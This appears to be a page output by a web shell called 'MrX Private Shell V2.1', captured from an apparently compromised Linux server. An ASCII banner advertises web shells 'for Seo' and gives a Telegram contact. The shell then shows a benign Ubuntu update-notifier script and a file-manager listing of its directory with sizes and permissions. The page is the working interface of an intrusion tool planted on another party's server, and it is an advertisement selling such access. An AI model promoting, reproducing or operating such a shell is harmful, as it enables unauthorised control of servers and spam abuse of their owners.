__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh
# we do not include ". gettext.sh" here because:
# a) it breaks if its not available
# b) the string we have here does not need it (because it has no vars)
eval_gettext() {
if [ -x /usr/bin/gettext ]; then
echo $(gettext "$1")
else
echo "$1"
fi
}
export TEXTDOMAIN=update-notifier
export TEXTDOMAINDIR=/usr/share/locale
# Print the message
echo ""
eval_gettext "The list of available updates is more than a week old."
eval_gettext "To check for new updates run: sudo apt update"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| plugins | Folder | 0755 |
|
|
| upgrader-patches | Folder | 0755 |
|
|
| notify-reboot-required | File | 1.51 KB | 0755 |
|
| notify-updates-outdated | File | 519 B | 0755 |
|
| package-data-downloads-failed | File | 37.77 KB | 0644 |
|
| package-data-downloads-failed-permanently | File | 43.65 KB | 0644 |
|